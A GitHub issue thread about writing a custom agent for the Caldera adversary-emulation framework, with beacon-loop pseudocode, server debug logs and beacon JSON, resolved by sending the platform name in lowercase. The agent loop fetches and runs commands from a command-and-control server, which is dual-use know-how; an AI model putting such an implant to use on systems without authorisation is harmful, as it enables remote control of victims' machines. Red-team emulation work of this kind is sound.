Custom agent, no instructions received

[AndyCyberSec]

Hello, can someone explain the logic of an agent to receive instructions and run operations? I know it's a generic question but I followed the docs with no luck.

Below there is a pseudo code to show the logic I implemented following the doc, unfortunately this way doesn't work. I receive a couple of instructions then Caldera responds to beacon with empty instructions although the operation is running.

while True:
    response = send_beacon() 
    set_paw(response['paw'])

    for instruction in response['instructions']:
        out = run_command(instruction['command'])
        send_beacon(beacon + out results)
        sleep(instruction['sleep'])

    response['sleep']

If the agent is idle for a while waiting for commands and then I run an operation, I always receive empty instructions. If I run an operation just after executing the agent I receive only the first instruction, then caldera responds to beacon with empty instructions.

Of course with the sandcat agent it works fine

Thanks

[github-actions[bot]]

Looks like your first issue -- we aim to respond to issues as quickly as possible. In the meantime, check out our documentation here: http://caldera.readthedocs.io/

[github-actions[bot]]

This issue is stale because it has been open 20 days with no activity. Remove stale label or comment or this will be closed in 5 days

[AndyCyberSec]

Up

[clenk]

@AndyCyberSec If you run the server with --log debug do you see messages like the following?

• 'Incoming ____ beacon from ____'
• 'Received result for link ____ from agent ____ via contact ____'
• 'First time ____ beacon from ____'

What information is the agent sending in its beacon? Is it including platform and executors? And do the platform/executors match the abilities being sent to the agent?

[github-actions[bot]]

This issue is stale because it has been open 20 days with no activity. Remove stale label or comment or this will be closed in 5 days

[mkultraWasHere]

@AndyCyberSec See question above.

[AndyCyberSec]

Thanks for the answer, I activated the debug and I can see those messages

2022-08-23 17:32:04 - DEBUG (contact_svc.py:84 handle_heartbeat) First time HTTP beacon from dovcat
2022-08-23 17:32:04 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:32:04 - DEBUG (contact_svc.py:66 handle_heartbeat) Received result for link fb7eca77-8f51-4176-bad0-2dda4a20ee13 from agent dovcat via contact HTTP
2022-08-23 17:32:04 - DEBUG (protocol.py:253 __init__) = connection is CONNECTING
2022-08-23 17:32:04 - DEBUG (client.py:111 write_http_request) > GET /link/completed HTTP/1.1
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Host: 0.0.0.0:7012
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Upgrade: websocket
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Connection: Upgrade
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Key: vSp0S8VkaHjbBPjPPzvrlw==
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Version: 13
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > User-Agent: Python/3.9 websockets/10.3
2022-08-23 17:32:04 - DEBUG (protocol.py:253 __init__) = connection is CONNECTING
2022-08-23 17:32:04 - DEBUG (client.py:111 write_http_request) > GET /link/status_changed HTTP/1.1
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Host: 0.0.0.0:7012
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Upgrade: websocket
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Connection: Upgrade
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Key: AHdLPfMt/jB7YLDJVhJgbA==
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Version: 13
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
2022-08-23 17:32:04 - DEBUG (client.py:113 write_http_request) > User-Agent: Python/3.9 websockets/10.3
2022-08-23 17:32:04 - DEBUG (client.py:144 read_http_response) < HTTP/1.1 101 Switching Protocols
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Upgrade: websocket
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Connection: Upgrade
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Accept: iOIHmxdplTq74TvOAQ9LqSbohwI=
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Extensions: permessage-deflate; server_max_window_bits=12; client_max_window_bits=12
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Date: Tue, 23 Aug 2022 15:32:04 GMT
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Server: Python/3.9 websockets/10.3
2022-08-23 17:32:04 - DEBUG (protocol.py:342 connection_open) = connection is OPEN
2022-08-23 17:32:04 - DEBUG (protocol.py:1152 read_frame) < CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:32:04 - DEBUG (protocol.py:1207 write_close_frame) = connection is CLOSING
2022-08-23 17:32:04 - DEBUG (protocol.py:1158 write_frame_sync) > CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:32:04 - DEBUG (client.py:144 read_http_response) < HTTP/1.1 101 Switching Protocols
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Upgrade: websocket
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Connection: Upgrade
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Accept: bYCFeaCcv5siB97NwIzE9KvyFrc=
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Extensions: permessage-deflate; server_max_window_bits=12; client_max_window_bits=12
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Date: Tue, 23 Aug 2022 15:32:04 GMT
2022-08-23 17:32:04 - DEBUG (client.py:146 read_http_response) < Server: Python/3.9 websockets/10.3
2022-08-23 17:32:04 - DEBUG (protocol.py:342 connection_open) = connection is OPEN
2022-08-23 17:32:04 - DEBUG (protocol.py:1152 read_frame) < CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:32:04 - DEBUG (protocol.py:1207 write_close_frame) = connection is CLOSING
2022-08-23 17:32:04 - DEBUG (protocol.py:1158 write_frame_sync) > CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:32:04 - DEBUG (protocol.py:1489 connection_lost) = connection is CLOSED
2022-08-23 17:32:04 - DEBUG (protocol.py:1489 connection_lost) = connection is CLOSED
2022-08-23 17:32:42 - DEBUG (auth_svc.py:125 login_redirect) Using login handler "Default Login Handler" for login redirect
2022-08-23 17:32:44 - DEBUG (auth_svc.py:100 login_user) Using login handler "Default Login Handler" for login
2022-08-23 17:32:44 - DEBUG (auth_svc.py:155 handle_successful_login) admin logging in
2022-08-23 17:32:55 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:33:21 - DEBUG (protocol.py:253 __init__) = connection is CONNECTING
2022-08-23 17:33:21 - DEBUG (client.py:111 write_http_request) > GET /planner/bucket_transition HTTP/1.1
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Host: 0.0.0.0:7012
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Upgrade: websocket
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Connection: Upgrade
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Key: /F7foJePADqbf9pZa//6aQ==
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Version: 13
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > User-Agent: Python/3.9 websockets/10.3
2022-08-23 17:33:21 - DEBUG (client.py:144 read_http_response) < HTTP/1.1 101 Switching Protocols
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Upgrade: websocket
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Connection: Upgrade
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Accept: zK7DErVc16tvkh7JkYQjfPtJuJs=
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Extensions: permessage-deflate; server_max_window_bits=12; client_max_window_bits=12
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Date: Tue, 23 Aug 2022 15:33:21 GMT
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Server: Python/3.9 websockets/10.3
2022-08-23 17:33:21 - DEBUG (protocol.py:342 connection_open) = connection is OPEN
2022-08-23 17:33:21 - DEBUG (protocol.py:1152 read_frame) < CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:33:21 - DEBUG (protocol.py:1207 write_close_frame) = connection is CLOSING
2022-08-23 17:33:21 - DEBUG (protocol.py:1158 write_frame_sync) > CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:33:21 - DEBUG (protocol.py:1489 connection_lost) = connection is CLOSED
2022-08-23 17:33:21 - DEBUG (planning_svc.py:179 get_links) Generated 0 usable links
2022-08-23 17:33:21 - DEBUG (protocol.py:253 __init__) = connection is CONNECTING
2022-08-23 17:33:21 - DEBUG (client.py:111 write_http_request) > GET /planner/bucket_transition HTTP/1.1
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Host: 0.0.0.0:7012
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Upgrade: websocket
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Connection: Upgrade
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Key: K6k4Za38J2n8xik2XNV16g==
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Version: 13
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
2022-08-23 17:33:21 - DEBUG (client.py:113 write_http_request) > User-Agent: Python/3.9 websockets/10.3
2022-08-23 17:33:21 - DEBUG (client.py:144 read_http_response) < HTTP/1.1 101 Switching Protocols
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Upgrade: websocket
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Connection: Upgrade
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Accept: qrOUtLjoe9OeWMcL1tgXF8AyuPQ=
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Sec-WebSocket-Extensions: permessage-deflate; server_max_window_bits=12; client_max_window_bits=12
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Date: Tue, 23 Aug 2022 15:33:21 GMT
2022-08-23 17:33:21 - DEBUG (client.py:146 read_http_response) < Server: Python/3.9 websockets/10.3
2022-08-23 17:33:21 - DEBUG (protocol.py:342 connection_open) = connection is OPEN
2022-08-23 17:33:21 - DEBUG (protocol.py:1152 read_frame) < CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:33:21 - DEBUG (protocol.py:1207 write_close_frame) = connection is CLOSING
2022-08-23 17:33:21 - DEBUG (protocol.py:1158 write_frame_sync) > CLOSE 1000 (OK) [2 bytes]
2022-08-23 17:33:21 - DEBUG (protocol.py:1489 connection_lost) = connection is CLOSED
2022-08-23 17:33:51 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:34:41 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:35:27 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:36:12 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:36:43 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:37:39 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:38:38 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:39:12 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat
2022-08-23 17:39:51 - DEBUG (contact_svc.py:64 handle_heartbeat) Incoming HTTP beacon from dovcat

Below the agent view:

[+] Beacon (HTTP): ALIVE
[*] Running instruction fb7eca77-8f51-4176-bad0-2dda4a20ee13
[*] Submitting results for link fb7eca77-8f51-4176-bad0-2dda4a20ee13 via C2 channel HTTP
[*] Instruction sleep 0sec
[*] Beacon sleep 51sec
[*] Beacon content: {'architecture': 'x86_64', 'available_contacts': ['HTTP'], 'contact': 'HTTP', 'deadman_enabled': False, 'exe_name': 'Python', 'executors': ['sh', 'proc'], 'group': 'red', 'host': 'redacted', 'host_ip_addrs': ['192.168.4.443'], 'location': '/path/caldera_agent', 'origin_link_id': '', 'paw': 'dovcat', 'pid': 11060, 'platform': 'Darwin', 'ppid': 2130, 'privilege': 'User', 'proxy_receivers': None, 'server': 'http://127.0.0.1:8888', 'upstream_dest': 'http://127.0.0.1:8888', 'username': 'roccosiffredi'}
[+] Beacon (HTTP): ALIVE
[*] Beacon sleep 56sec
[*] Beacon content: {'architecture': 'x86_64', 'available_contacts': ['HTTP'], 'contact': 'HTTP', 'deadman_enabled': False, 'exe_name': 'Python', 'executors': ['sh', 'proc'], 'group': 'red', 'host': 'redacted', 'host_ip_addrs': ['192.168.4.443'], 'location': '/path/caldera_agent', 'origin_link_id': '', 'paw': 'dovcat', 'pid': 11060, 'platform': 'Darwin', 'ppid': 2130, 'privilege': 'User', 'proxy_receivers': None, 'server': 'http://127.0.0.1:8888', 'upstream_dest': 'http://127.0.0.1:8888', 'username': 'roccosiffredi'}
[+] Beacon (HTTP): ALIVE
[*] Beacon sleep 50sec
[*] Beacon content: {'architecture': 'x86_64', 'available_contacts': ['HTTP'], 'contact': 'HTTP', 'deadman_enabled': False, 'exe_name': 'Python', 'executors': ['sh', 'proc'], 'group': 'red', 'host': 'redacted', 'host_ip_addrs': ['192.168.4.443'], 'location': '/path/caldera_agent', 'origin_link_id': '', 'paw': 'dovcat', 'pid': 11060, 'platform': 'Darwin', 'ppid': 2130, 'privilege': 'User', 'proxy_receivers': None, 'server': 'http://127.0.0.1:8888', 'upstream_dest': 'http://127.0.0.1:8888', 'username': 'roccosiffredi'}
[+] Beacon (HTTP): ALIVE
[*] Beacon sleep 46sec
[*] Beacon content: {'architecture': 'x86_64', 'available_contacts': ['HTTP'], 'contact': 'HTTP', 'deadman_enabled': False, 'exe_name': 'Python', 'executors': ['sh', 'proc'], 'group': 'red', 'host': 'redacted', 'host_ip_addrs': ['192.168.4.443'], 'location': '/path/caldera_agent', 'origin_link_id': '', 'paw': 'dovcat', 'pid': 11060, 'platform': 'Darwin', 'ppid': 2130, 'privilege': 'User', 'proxy_receivers': None, 'server': 'http://127.0.0.1:8888', 'upstream_dest': 'http://127.0.0.1:8888', 'username': 'roccosiffredi'}
[+] Beacon (HTTP): ALIVE
[*] Beacon sleep 45sec
[*] Beacon content: {'architecture': 'x86_64', 'available_contacts': ['HTTP'], 'contact': 'HTTP', 'deadman_enabled': False, 'exe_name': 'Python', 'executors': ['sh', 'proc'], 'group': 'red', 'host': 'redacted', 'host_ip_addrs': ['192.168.4.443'], 'location': '/path/caldera_agent', 'origin_link_id': '', 'paw': 'dovcat', 'pid': 11060, 'platform': 'Darwin', 'ppid': 2130, 'privilege': 'User', 'proxy_receivers': None, 'server': 'http://127.0.0.1:8888', 'upstream_dest': 'http://127.0.0.1:8888', 'username': 'roccosiffredi'}

And below the nothing happening caldera view when running ops:

https://dropover.cloud/469bd5#a65b6566-03bf-46d6-a926-09464583882c

The Op is running the standard "Check" adversary

[AndyCyberSec]

I think I have found the issue. The platform value sent within the beacon must be lowercase. In my case it was Darwin and did not work, using darwin seems to be working fine.

I hope it's lowercase for every platform value

[mkultraWasHere]

@AndyCyberSec reopen if you find the bug reoccurs